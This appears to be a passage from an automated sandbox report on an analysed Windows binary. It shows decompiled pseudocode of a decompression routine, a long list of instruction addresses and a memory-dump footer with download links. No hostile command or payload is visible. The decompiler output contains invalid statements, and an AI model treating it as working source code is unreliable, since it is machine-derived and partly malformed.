									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406131
                                                                                                        0x00406136
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x00000000
                                                                                                        0x004069a1
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00000000
                                                                                                        0x00406810
                                                                                                        0x00406138
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x00000000
                                                                                                        0x00406369
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f5
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a5
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x004069b7
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x004069d3
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x00000000
                                                                                                        0x004061ec
                                                                                                        0x00406278
                                                                                                        0x00406181
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x00000000
                                                                                                        0x00406509
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x00000000
                                                                                                        0x0040679a
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00000000
                                                                                                        0x0040690d
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
